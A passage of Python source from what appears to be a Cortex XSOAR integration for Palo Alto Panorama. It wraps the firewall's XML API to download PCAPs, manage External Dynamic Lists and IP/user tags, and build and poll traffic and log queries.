VSYS and serial_number:\n raise Exception('The serialNumber argument can only be used in a Panorama instance configuration')\n elif DEVICE_GROUP and not serial_number:\n raise Exception('PCAP listing is only supported on Panorama with the serialNumber argument.')\n elif serial_number:\n params['target'] = serial_number\n\n file_name = None\n if pcap_id:\n params['pcap-id'] = pcap_id\n if pcap_name:\n params['from'] = pcap_name\n file_name = pcap_name\n if local_name:\n params['to'] = local_name\n file_name = local_name\n if serial_no:\n params['serialno'] = serial_no\n if session_id:\n params['sessionid'] = session_id\n if device_name:\n params['device_name'] = device_name\n if search_time:\n search_time = validate_search_time(search_time)\n params['search-time'] = search_time\n\n # set file name to the current time if from/to were not specified\n if not file_name:\n file_name = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S')\n\n result = http_request(URL, 'GET', params=params, is_pcap=True)\n\n # due to pcap file size limitation in the product. For more details, please see the documentation.\n if result.headers['Content-Type'] != 'application/octet-stream':\n raise Exception(\n 'PCAP download failed. 
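# --- Editor's illustration (not part of the integration code) ---
# validate_search_time() above accepts either YYYY/MM/DD or YYYY/MM/DD HH:MM:SS
# and pads date-only input with a midnight timestamp. A standalone re-run of
# that logic:
from datetime import datetime

def _demo_validate_search_time(search_time: str) -> str:
    try:
        datetime.strptime(search_time, '%Y/%m/%d')
        return search_time + ' 00:00:00'
    except ValueError:
        pass
    datetime.strptime(search_time, '%Y/%m/%d %H:%M:%S')  # raises ValueError if invalid
    return search_time

assert _demo_validate_search_time('2021/01/15') == '2021/01/15 00:00:00'
assert _demo_validate_search_time('2021/01/15 08:30:00') == '2021/01/15 08:30:00'
# --- end illustration ---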
Most likely cause is the file size limitation.\\n'\n 'For information on how to download manually, see the documentation for this integration.')\n\n file = fileResult(file_name + \".pcap\", result.content)\n return_results(file)\n\n\n''' Applications '''\n\n\ndef prettify_applications_arr(applications_arr: Union[List[dict], dict]):\n pretty_application_arr = []\n if not isinstance(applications_arr, list):\n applications_arr = [applications_arr]\n for i in range(len(applications_arr)):\n application = applications_arr[i]\n pretty_application_arr.append({\n 'SubCategory': application.get('subcategory'),\n 'Risk': application.get('risk'),\n 'Technology': application.get('technology'),\n 'Name': application.get('@name'),\n 'Description': application.get('description'),\n 'Id': application.get('@id'),\n })\n return pretty_application_arr\n\n\n@logger\ndef panorama_list_applications(predefined: bool):\n major_version = get_pan_os_major_version()\n params = {\n 'type': 'config',\n 'action': 'get',\n 'key': API_KEY\n }\n if predefined:\n if major_version < 9:\n raise Exception('Listing predefined applications is only available for PAN-OS 9.X and above versions.')\n else:\n params['xpath'] = '/config/predefined/application'\n else:\n params['xpath'] = XPATH_OBJECTS + \"application/entry\"\n\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n applications = result['response']['result']\n if predefined:\n application_arr = applications.get('application', {}).get('entry')\n else:\n if major_version < 9:\n application_arr = applications.get('entry')\n else:\n application_arr = applications.get('application')\n\n return application_arr\n\n\ndef panorama_list_applications_command(predefined: Optional[str] = None):\n \"\"\"\n List all applications\n \"\"\"\n predefined = predefined == 'true'\n applications_arr = panorama_list_applications(predefined)\n applications_arr_output = prettify_applications_arr(applications_arr)\n headers = ['Id', 'Name', 'Risk', 'Category', 'SubCategory', 'Technology', 'Description']\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': applications_arr,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Applications', t=applications_arr_output, headers=headers),\n 'EntryContext': {\n \"Panorama.Applications(val.Name == obj.Name)\": applications_arr_output\n }\n })\n\n\n''' External Dynamic Lists Commands '''\n\n\ndef prettify_edls_arr(edls_arr: Union[list, dict]):\n pretty_edls_arr = []\n if not isinstance(edls_arr, list): # handle case of only one edl in the instance\n return prettify_edl(edls_arr)\n for edl in edls_arr:\n pretty_edl = {\n 'Name': edl['@name'],\n 'Type': ''.join(edl['type'].keys())\n }\n edl_type = pretty_edl['Type']\n\n if edl['type'][edl_type]:\n if 'url' in edl['type'][edl_type]:\n pretty_edl['URL'] = edl['type'][edl_type]['url']\n if 'certificate-profile' in edl['type'][edl_type]:\n pretty_edl['CertificateProfile'] = edl['type'][edl_type]['certificate-profile']\n if 'recurring' in edl['type'][edl_type]:\n pretty_edl['Recurring'] = ''.join(edl['type'][edl_type]['recurring'].keys())\n if 'description' in edl['type'][edl_type]:\n pretty_edl['Description'] = edl['type'][edl_type]['description']\n\n if DEVICE_GROUP:\n pretty_edl['DeviceGroup'] = DEVICE_GROUP\n\n pretty_edls_arr.append(pretty_edl)\n\n return pretty_edls_arr\n\n\n@logger\ndef panorama_list_edls():\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"external-list/entry\",\n 
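# Editor's note: xml2json returns the EDL 'type' element as a single-key dict
# (e.g. {'ip': {...}} or {'url': {...}}), which is why prettify_edl() and
# prettify_edls_arr() recover the type name with ''.join(edl['type'].keys());
# the same trick is applied to the 'recurring' element ({'hourly': None} -> 'hourly').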
'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n return result['response']['result']['entry']\n\n\ndef panorama_list_edls_command():\n \"\"\"\n Get all EDLs\n \"\"\"\n edls_arr = panorama_list_edls()\n edls_output = prettify_edls_arr(edls_arr)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': edls_arr,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('External Dynamic Lists:', edls_output,\n ['Name', 'Type', 'URL', 'Recurring', 'CertificateProfile', 'Description'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.EDL(val.Name == obj.Name)\": edls_output\n }\n })\n\n\ndef prettify_edl(edl: dict):\n pretty_edl = {\n 'Name': edl['@name'],\n 'Type': ''.join(edl['type'].keys())\n }\n edl_type = pretty_edl['Type']\n\n if edl['type'][edl_type]:\n if 'url' in edl['type'][edl_type]:\n pretty_edl['URL'] = edl['type'][edl_type]['url']\n if 'certificate-profile' in edl['type'][edl_type]:\n pretty_edl['CertificateProfile'] = edl['type'][edl_type]['certificate-profile']\n if 'recurring' in edl['type'][edl_type]:\n pretty_edl['Recurring'] = ''.join(edl['type'][edl_type]['recurring'].keys())\n if 'description' in edl['type'][edl_type]:\n pretty_edl['Description'] = edl['type'][edl_type]['description']\n\n if DEVICE_GROUP:\n pretty_edl['DeviceGroup'] = DEVICE_GROUP\n\n return pretty_edl\n\n\n@logger\ndef panorama_get_edl(edl_name: str):\n params = {\n 'action': 'show',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"external-list/entry[@name='\" + edl_name + \"']\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_get_edl_command(edl_name: str):\n \"\"\"\n Get an EDL\n \"\"\"\n edl = panorama_get_edl(edl_name)\n edl_output = prettify_edl(edl)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': edl,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('External Dynamic List:', edl_output,\n ['Name', 'Type', 'URL', 'Recurring', 'CertificateProfile', 'Description'],\n None, True),\n 'EntryContext': {\n \"Panorama.EDL(val.Name == obj.Name)\": edl_output\n }\n })\n\n\n@logger\ndef panorama_create_edl(edl_name: str, url: str, type_: str, recurring: str, certificate_profile: Optional[str],\n description: Optional[str]):\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"external-list/entry[@name='\" + edl_name + \"']/type/\" + type_,\n 'key': API_KEY\n }\n\n params['element'] = add_argument(url, 'url', False) + '<' + recurring + '/>' + add_argument(\n certificate_profile, 'certificate-profile', False) + add_argument(description, 'description', False)\n\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_create_edl_command(args: Dict[str, str]):\n \"\"\"\n Create an edl object\n \"\"\"\n edl_name = args.get('name')\n url = args.get('url', '').replace(' ', '%20')\n type_ = args.get('type')\n recurring = args.get('recurring')\n certificate_profile = args.get('certificate_profile')\n description = args.get('description')\n\n edl = panorama_create_edl(edl_name, url, type_, recurring, certificate_profile, description)\n\n edl_output = {\n 'Name': edl_name,\n 'URL': url,\n 'Type': type_,\n 'Recurring': recurring\n }\n\n if DEVICE_GROUP:\n edl_output['DeviceGroup'] = DEVICE_GROUP\n if description:\n edl_output['Description'] = description\n if 
certificate_profile:\n edl_output['CertificateProfile'] = certificate_profile\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': edl,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'External Dynamic List was created successfully.',\n 'EntryContext': {\n \"Panorama.EDL(val.Name == obj.Name)\": edl_output\n }\n })\n\n\n@logger\ndef panorama_edit_edl(edl_name: str, element_to_change: str, element_value: str):\n edl_prev = panorama_get_edl(edl_name)\n if '@dirtyId' in edl_prev:\n LOG(f'Found uncommitted item:\\n{edl_prev}')\n raise Exception('Please commit the instance prior to editing the External Dynamic List')\n edl_type = ''.join(edl_prev['type'].keys())\n edl_output = {'Name': edl_name}\n if DEVICE_GROUP:\n edl_output['DeviceGroup'] = DEVICE_GROUP\n params = {\n 'action': 'edit', 'type': 'config', 'key': API_KEY,\n 'xpath': f\"{XPATH_OBJECTS}external-list/entry[@name='{edl_name}']/type/{edl_type}/{element_to_change}\"\n }\n\n if element_to_change == 'url':\n params['element'] = add_argument_open(element_value, 'url', False)\n result = http_request(URL, 'POST', body=params)\n edl_output['URL'] = element_value\n\n elif element_to_change == 'certificate_profile':\n params['element'] = add_argument_open(element_value, 'certificate-profile', False)\n result = http_request(URL, 'POST', body=params)\n edl_output['CertificateProfile'] = element_value\n\n elif element_to_change == 'description':\n params['element'] = add_argument_open(element_value, 'description', False)\n result = http_request(URL, 'POST', body=params)\n edl_output['Description'] = element_value\n\n # element_to_change == 'recurring'\n else:\n if element_value not in ['five-minute', 'hourly']:\n raise Exception('Recurring segment must be five-minute or hourly')\n params['element'] = '<' + element_value + '/>'\n result = http_request(URL, 'POST', body=params)\n edl_output['Recurring'] = element_value\n\n return result, edl_output\n\n\ndef panorama_edit_edl_command(args: dict):\n \"\"\"\n Edit an EDL\n \"\"\"\n edl_name = args['name']\n element_to_change = args['element_to_change']\n element_value = args['element_value']\n\n result, edl_output = panorama_edit_edl(edl_name, element_to_change, element_value)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'External Dynamic List was edited successfully',\n 'EntryContext': {\n \"Panorama.EDL(val.Name == obj.Name)\": edl_output\n }\n })\n\n\n@logger\ndef panorama_delete_edl(edl_name: str):\n params = {\n 'action': 'delete',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"external-list/entry[@name='\" + edl_name + \"']\",\n 'element': \"\",\n 'key': API_KEY\n }\n\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_delete_edl_command(edl_name: str):\n \"\"\"\n Delete an EDL\n \"\"\"\n edl = panorama_delete_edl(edl_name)\n edl_output = {'Name': edl_name}\n if DEVICE_GROUP:\n edl_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': edl,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'External Dynamic List was deleted successfully',\n 'EntryContext': {\n \"Panorama.EDL(val.Name == obj.Name)\": edl_output\n }\n })\n\n\ndef panorama_refresh_edl(edl_name: str, edl_type: str, location: str, vsys: str):\n params = {\n 'type': 'op',\n 'key': API_KEY\n }\n # if 
refreshing an EDL on the FW\n    if not edl_type and not location and not vsys:\n        edl = panorama_get_edl(edl_name)\n        edl_type = ''.join(edl['type'].keys())\n    # if refreshing an EDL on the Panorama\n    else:\n        if not edl_type or not location or not vsys:\n            raise Exception('To refresh an EDL from the Firewall on Panorama'\n                            ' please use the: edl_type, location and vsys arguments.')\n\n    params['cmd'] = f'<request><system><external-list><refresh><type><{edl_type}><name>{edl_name}</name>' \\\n                    f'</{edl_type}></type></refresh></external-list></system></request>'\n    if location:\n        params['location'] = location\n    if vsys:\n        params['vsys'] = vsys\n\n    result = http_request(\n        URL,\n        'POST',\n        body=params,\n    )\n\n    return result\n\n\n
def panorama_refresh_edl_command(args: dict):\n    \"\"\"\n    Refresh an EDL\n    \"\"\"\n    if DEVICE_GROUP:\n        raise Exception('EDL refresh is only supported on Firewall (not Panorama).')\n\n    edl_name = args.get('name', '')\n    edl_type = args.get('edl_type', '')\n    location = args.get('location', '')\n    vsys = args.get('vsys', '')\n\n    result = panorama_refresh_edl(edl_name, edl_type, location, vsys)\n\n    return_results({\n        'Type': entryTypes['note'],\n        'ContentsFormat': formats['json'],\n        'Contents': result,\n        'ReadableContentsFormat': formats['text'],\n        'HumanReadable': 'Refreshed External Dynamic List successfully',\n    })\n\n\n''' IP Tags '''\n\n\n
@logger\ndef panorama_register_ip_tag(tag: str, ips: List, persistent: str):\n    entry: str = ''\n    for ip in ips:\n        entry += f'<entry ip=\"{ip}\" persistent=\"{persistent}\"><tag><member>{tag}</member></tag></entry>'\n\n    params = {\n        'type': 'user-id',\n        'cmd': '<uid-message><version>2.0</version><type>update</type><payload><register>' + entry\n               + '</register></payload></uid-message>',\n        'key': API_KEY\n    }\n\n    result = http_request(\n        URL,\n        'POST',\n        body=params,\n    )\n\n    return result\n\n\n
def panorama_register_ip_tag_command(args: dict):\n    \"\"\"\n    Register IPs to a Tag\n    \"\"\"\n    tag = args['tag']\n    ips = argToList(args['IPs'])\n\n    persistent = args['persistent'] if 'persistent' in args else 'true'\n    persistent = '1' if persistent == 'true' else '0'\n\n    result = panorama_register_ip_tag(tag, ips, str(persistent))\n\n    registered_ip: Dict[str, str] = {}\n    # update context only if IPs are persistent\n    if persistent == '1':\n        # get existing IPs for this tag\n        context_ips = demisto.dt(demisto.context(), 'Panorama.DynamicTags(val.Tag ==\\\"' + tag + '\\\").IPs')\n\n        if context_ips:\n            all_ips = ips + context_ips\n        else:\n            all_ips = ips\n\n        registered_ip = {\n            'Tag': tag,\n            'IPs': all_ips\n        }\n\n    return_results({\n        'Type': entryTypes['note'],\n        'ContentsFormat': formats['json'],\n        'Contents': result,\n        'ReadableContentsFormat': formats['text'],\n        'HumanReadable': 'Registered ip-tag successfully',\n        'EntryContext': {\n            \"Panorama.DynamicTags(val.Tag == obj.Tag)\": registered_ip\n        }\n    })\n\n\n
@logger\ndef panorama_unregister_ip_tag(tag: str, ips: list):\n    entry = ''\n    for ip in ips:\n        entry += '<entry ip=\"' + ip + '\"><tag><member>' + tag + '</member></tag></entry>'\n\n    params = {\n        'type': 'user-id',\n        'cmd': '<uid-message><version>2.0</version><type>update</type><payload><unregister>' + entry\n               + '</unregister></payload></uid-message>',\n        'key': API_KEY\n    }\n    result = http_request(\n        URL,\n        'POST',\n        body=params,\n    )\n\n    return result\n\n\n
def panorama_unregister_ip_tag_command(args: dict):\n    \"\"\"\n    Unregister IPs from a Tag\n    \"\"\"\n    tag = args['tag']\n    ips = argToList(args['IPs'])\n\n    result = panorama_unregister_ip_tag(tag, ips)\n\n    return_results({\n        'Type': entryTypes['note'],\n        'ContentsFormat': formats['json'],\n        'Contents': result,\n        'ReadableContentsFormat': formats['text'],\n        'HumanReadable': 'Unregistered ip-tag successfully'\n    })\n\n\n''' User Tags '''\n\n\n
@logger\ndef panorama_register_user_tag(tag: str, users: List):\n    entry: str = ''\n    for user in users:\n        entry += f'<entry user=\"{user}\"><tag><member>{tag}</member></tag></entry>'\n\n    params = {\n        'type': 'user-id',\n        'cmd': f'<uid-message><version>2.0</version><type>update</type><payload><register-user>{entry}'\n               f'</register-user></payload></uid-message>',\n        'key': API_KEY\n    }\n\n    result = http_request(\n        
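# Editor's note: rendered form of the user-id payload built above
# (illustrative values; whitespace added for readability):
#   <uid-message><version>2.0</version><type>update</type><payload><register-user>
#     <entry user="alice"><tag><member>demo-tag</member></tag></entry>
#   </register-user></payload></uid-message>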
URL,\n        'POST',\n        body=params,\n    )\n\n    return result\n\n\n
def panorama_register_user_tag_command(args: dict):\n    \"\"\"\n    Register Users to a Tag\n    \"\"\"\n    major_version = get_pan_os_major_version()\n    if major_version <= 8:\n        raise Exception('The panorama-register-user-tag command is only available for PAN-OS 9.X and above versions.')\n    tag = args['tag']\n    users = argToList(args['Users'])\n\n    result = panorama_register_user_tag(tag, users)\n\n    # get existing Users for this tag\n    context_users = demisto.dt(demisto.context(), 'Panorama.DynamicTags(val.Tag ==\\\"' + tag + '\\\").Users')\n\n    if context_users:\n        all_users = users + context_users\n    else:\n        all_users = users\n\n    registered_user = {\n        'Tag': tag,\n        'Users': all_users\n    }\n\n    return_results({\n        'Type': entryTypes['note'],\n        'ContentsFormat': formats['json'],\n        'Contents': result,\n        'ReadableContentsFormat': formats['text'],\n        'HumanReadable': 'Registered user-tag successfully',\n        'EntryContext': {\n            \"Panorama.DynamicTags(val.Tag == obj.Tag)\": registered_user\n        }\n    })\n\n\n
@logger\ndef panorama_unregister_user_tag(tag: str, users: list):\n    entry = ''\n    for user in users:\n        entry += f'<entry user=\"{user}\"><tag><member>{tag}</member></tag></entry>'\n\n    params = {\n        'type': 'user-id',\n        'cmd': f'<uid-message><version>2.0</version><type>update</type><payload><unregister-user>{entry}'\n               f'</unregister-user></payload></uid-message>',\n        'key': API_KEY\n    }\n    result = http_request(\n        URL,\n        'POST',\n        body=params,\n    )\n\n    return result\n\n\n
def panorama_unregister_user_tag_command(args: dict):\n    \"\"\"\n    Unregister Users from a Tag\n    \"\"\"\n    major_version = get_pan_os_major_version()\n    if major_version <= 8:\n        raise Exception('The panorama-unregister-user-tag command is only available for PAN-OS 9.X and above versions.')\n    tag = args['tag']\n    users = argToList(args['Users'])\n\n    result = panorama_unregister_user_tag(tag, users)\n\n    return_results({\n        'Type': entryTypes['note'],\n        'ContentsFormat': formats['json'],\n        'Contents': result,\n        'ReadableContentsFormat': formats['text'],\n        'HumanReadable': 'Unregistered user-tag successfully'\n    })\n\n\n''' Traffic Logs '''\n\n\n
def build_traffic_logs_query(source: str, destination: Optional[str], receive_time: Optional[str],\n                             application: Optional[str], to_port: Optional[str], action: Optional[str]):\n    query = ''\n    if source and len(source) > 0:\n        query += '(addr.src in ' + source + ')'\n    if destination and len(destination) > 0:\n        if len(query) > 0 and query[-1] == ')':\n            query += ' and '\n        query += '(addr.dst in ' + destination + ')'\n    if receive_time and len(receive_time) > 0:\n        if len(query) > 0 and query[-1] == ')':\n            query += ' and '\n        query += '(receive_time geq ' + receive_time + ')'\n    if application and len(application) > 0:\n        if len(query) > 0 and query[-1] == ')':\n            query += ' and '\n        query += '(app eq ' + application + ')'\n    if to_port and len(to_port) > 0:\n        if len(query) > 0 and query[-1] == ')':\n            query += ' and '\n        query += '(port.dst eq ' + to_port + ')'\n    if action and len(action) > 0:\n        if len(query) > 0 and query[-1] == ')':\n            query += ' and '\n        query += '(action eq ' + action + ')'\n    return query\n\n\n
@logger\ndef panorama_query_traffic_logs(number_of_logs: str, direction: str, query: str, source: str, destination: str,\n                                receive_time: str, application: str, to_port: str, action: str):\n    params = {\n        'type': 'log',\n        'log-type': 'traffic',\n        'key': API_KEY\n    }\n\n    if query and len(query) > 0:\n        params['query'] = query\n    else:\n        params['query'] = build_traffic_logs_query(source, destination, receive_time, application, to_port, action)\n    if number_of_logs:\n        params['nlogs'] = number_of_logs\n    if direction:\n        params['dir'] = direction\n    result = 
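# Editor's note: example of what build_traffic_logs_query() above produces for
# source='10.0.0.1', application='dns', action='deny':
#   (addr.src in 10.0.0.1) and (app eq dns) and (action eq deny)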
http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result\n\n\ndef panorama_query_traffic_logs_command(args: dict):\n \"\"\"\n Query the traffic logs\n \"\"\"\n number_of_logs = args.get('number_of_logs')\n direction = args.get('direction')\n query = args.get('query')\n source = args.get('source')\n destination = args.get('destination')\n receive_time = args.get('receive_time')\n application = args.get('application')\n to_port = args.get('to_port')\n action = args.get('action')\n\n if query and (source or destination or receive_time or application or to_port or action):\n raise Exception('Use the query argument or the '\n 'source, destination, receive_time, application, to_port, action arguments to build your query')\n\n result = panorama_query_traffic_logs(number_of_logs, direction, query,\n source, destination, receive_time, application, to_port, action)\n\n if result['response']['@status'] == 'error':\n if 'msg' in result['response'] and 'line' in result['response']['msg']:\n message = '. Reason is: ' + result['response']['msg']['line']\n raise Exception('Query traffic logs failed' + message)\n else:\n raise Exception('Query traffic logs failed.')\n\n if 'response' not in result or 'result' not in result['response'] or 'job' not in result['response']['result']:\n raise Exception('Missing JobID in response.')\n query_traffic_output = {\n 'JobID': result['response']['result']['job'],\n 'Status': 'Pending'\n }\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Query Traffic Logs:', query_traffic_output, ['JobID', 'Status'],\n removeNull=True),\n 'EntryContext': {\"Panorama.TrafficLogs(val.JobID == obj.JobID)\": query_traffic_output}\n })\n\n\n@logger\ndef panorama_get_traffic_logs(job_id: str):\n params = {\n 'action': 'get',\n 'type': 'log',\n 'job-id': job_id,\n 'key': API_KEY\n }\n\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result\n\n\ndef panorama_check_traffic_logs_status_command(job_id: str):\n result = panorama_get_traffic_logs(job_id)\n\n if result['response']['@status'] == 'error':\n if 'msg' in result['response'] and 'line' in result['response']['msg']:\n message = '. 
Reason is: ' + result['response']['msg']['line']\n raise Exception('Query traffic logs failed' + message)\n else:\n raise Exception('Query traffic logs failed.')\n\n query_traffic_status_output = {\n 'JobID': job_id,\n 'Status': 'Pending'\n }\n\n if 'response' not in result or 'result' not in result['response'] or 'job' not in result['response']['result'] \\\n or 'status' not in result['response']['result']['job']:\n raise Exception('Missing JobID status in response.')\n if result['response']['result']['job']['status'] == 'FIN':\n query_traffic_status_output['Status'] = 'Completed'\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Query Traffic Logs status:', query_traffic_status_output, ['JobID', 'Status'],\n removeNull=True),\n 'EntryContext': {\"Panorama.TrafficLogs(val.JobID == obj.JobID)\": query_traffic_status_output}\n })\n\n\ndef prettify_traffic_logs(traffic_logs: List[dict]):\n pretty_traffic_logs_arr = []\n for traffic_log in traffic_logs:\n pretty_traffic_log = {}\n if 'action' in traffic_log:\n pretty_traffic_log['Action'] = traffic_log['action']\n if 'action_source' in traffic_log:\n pretty_traffic_log['ActionSource'] = traffic_log['action_source']\n if 'application' in traffic_log:\n pretty_traffic_log['Application'] = traffic_log['application']\n if 'bytes' in traffic_log:\n pretty_traffic_log['Bytes'] = traffic_log['bytes']\n if 'bytes_received' in traffic_log:\n pretty_traffic_log['BytesReceived'] = traffic_log['bytes_received']\n if 'bytes_sent' in traffic_log:\n pretty_traffic_log['BytesSent'] = traffic_log['bytes_sent']\n if 'category' in traffic_log:\n pretty_traffic_log['Category'] = traffic_log['category']\n if 'device_name' in traffic_log:\n pretty_traffic_log['DeviceName'] = traffic_log['device_name']\n if 'dst' in traffic_log:\n pretty_traffic_log['Destination'] = traffic_log['dst']\n if 'dport' in traffic_log:\n pretty_traffic_log['DestinationPort'] = traffic_log['dport']\n if 'from' in traffic_log:\n pretty_traffic_log['FromZone'] = traffic_log['from']\n if 'proto' in traffic_log:\n pretty_traffic_log['Protocol'] = traffic_log['proto']\n if 'rule' in traffic_log:\n pretty_traffic_log['Rule'] = traffic_log['rule']\n if 'receive_time' in traffic_log:\n pretty_traffic_log['ReceiveTime'] = traffic_log['receive_time']\n if 'session_end_reason' in traffic_log:\n pretty_traffic_log['SessionEndReason'] = traffic_log['session_end_reason']\n if 'src' in traffic_log:\n pretty_traffic_log['Source'] = traffic_log['src']\n if 'sport' in traffic_log:\n pretty_traffic_log['SourcePort'] = traffic_log['sport']\n if 'start' in traffic_log:\n pretty_traffic_log['StartTime'] = traffic_log['start']\n if 'to' in traffic_log:\n pretty_traffic_log['ToZone'] = traffic_log['to']\n\n pretty_traffic_logs_arr.append(pretty_traffic_log)\n return pretty_traffic_logs_arr\n\n\ndef panorama_get_traffic_logs_command(job_id: str):\n result = panorama_get_traffic_logs(job_id)\n\n if result['response']['@status'] == 'error':\n if 'msg' in result['response'] and 'line' in result['response']['msg']:\n message = '. 
Reason is: ' + result['response']['msg']['line']\n raise Exception('Query traffic logs failed' + message)\n else:\n raise Exception('Query traffic logs failed.')\n\n query_traffic_logs_output = {\n 'JobID': job_id,\n 'Status': 'Pending'\n }\n\n if 'response' not in result or 'result' not in result['response'] or 'job' not in result['response']['result'] \\\n or 'status' not in result['response']['result']['job']:\n raise Exception('Missing JobID status in response.')\n\n if result['response']['result']['job']['status'] != 'FIN':\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Query Traffic Logs status:', query_traffic_logs_output,\n ['JobID', 'Status'], removeNull=True),\n 'EntryContext': {\"Panorama.TrafficLogs(val.JobID == obj.JobID)\": query_traffic_logs_output}\n })\n else: # FIN\n query_traffic_logs_output['Status'] = 'Completed'\n if 'response' not in result or 'result' not in result['response'] or 'log' not in result['response']['result'] \\\n or 'logs' not in result['response']['result']['log']:\n raise Exception('Missing logs in response.')\n\n logs = result['response']['result']['log']['logs']\n if logs['@count'] == '0':\n return_results('No traffic logs matched the query')\n else:\n pretty_traffic_logs = prettify_traffic_logs(logs['entry'])\n query_traffic_logs_output['Logs'] = pretty_traffic_logs\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Query Traffic Logs:', pretty_traffic_logs,\n ['JobID', 'Source', 'SourcePort', 'Destination', 'DestinationPort',\n 'Application', 'Action'], removeNull=True),\n 'EntryContext': {\"Panorama.TrafficLogs(val.JobID == obj.JobID)\": query_traffic_logs_output}\n })\n\n\n''' Logs '''\n\n\ndef build_array_query(query: str, arg_string: str, string: str, operator: str):\n list_string = argToList(arg_string)\n list_string_length = len(list_string)\n\n if list_string_length > 1:\n query += '('\n\n for i, item in enumerate(list_string):\n query += f'({string} {operator} \\'{item}\\')'\n if i < list_string_length - 1:\n query += ' or '\n\n if list_string_length > 1:\n query += ')'\n\n return query\n\n\ndef build_logs_query(address_src: Optional[str], address_dst: Optional[str], ip_: Optional[str],\n zone_src: Optional[str], zone_dst: Optional[str], time_generated: Optional[str],\n action: Optional[str], port_dst: Optional[str], rule: Optional[str], url: Optional[str],\n filedigest: Optional[str]):\n query = ''\n if address_src:\n query += build_array_query(query, address_src, 'addr.src', 'in')\n if address_dst:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += build_array_query(query, address_dst, 'addr.dst', 'in')\n if ip_:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query = build_array_query(query, ip_, 'addr.src', 'in')\n query += ' or '\n query = build_array_query(query, ip_, 'addr.dst', 'in')\n if zone_src:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += build_array_query(query, zone_src, 'zone.src', 'eq')\n if zone_dst:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += build_array_query(query, zone_dst, 'zone.dst', 'eq')\n if port_dst:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += build_array_query(query, port_dst, 'port.dst', 'eq')\n if 
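# --- Editor's illustration (not part of the integration code) ---
# build_array_query() above OR-joins multiple values for a single field and
# wraps the whole group in parentheses when there is more than one value. A
# standalone sketch of its output for two source addresses:
def _demo_array_query(values, field, op):
    parts = ' or '.join(f"({field} {op} '{value}')" for value in values)
    return f'({parts})' if len(values) > 1 else parts

assert _demo_array_query(['10.0.0.1', '10.0.0.2'], 'addr.src', 'in') == \
    "((addr.src in '10.0.0.1') or (addr.src in '10.0.0.2'))"
# --- end illustration ---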
time_generated:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += '(time_generated leq ' + time_generated + ')'\n if action:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += build_array_query(query, action, 'action', 'eq')\n if rule:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += build_array_query(query, rule, 'rule', 'eq')\n if url:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += build_array_query(query, url, 'url', 'contains')\n if filedigest:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += build_array_query(query, filedigest, 'filedigest', 'eq')\n\n return query\n\n\n@logger\ndef panorama_query_logs(log_type: str, number_of_logs: str, query: str, address_src: str, address_dst: str, ip_: str,\n zone_src: str, zone_dst: str, time_generated: str, action: str,\n port_dst: str, rule: str, url: str, filedigest: str):\n params = {\n 'type': 'log',\n 'log-type': log_type,\n 'key': API_KEY\n }\n\n if filedigest and log_type != 'wildfire':\n raise Exception('The filedigest argument is only relevant to wildfire log type.')\n if url and log_type == 'traffic':\n raise Exception('The url argument is not relevant to traffic log type.')\n\n if query:\n params['query'] = query\n else:\n if ip_ and (address_src or address_dst):\n raise Exception(\n 'The ip argument cannot be used with the address-source or the address-destination arguments.')\n params['query'] = build_logs_query(address_src, address_dst, ip_,\n zone_src, zone_dst, time_generated, action,\n port_dst, rule, url, filedigest)\n if number_of_logs:\n params['nlogs'] = number_of_logs\n\n result = http_request(\n 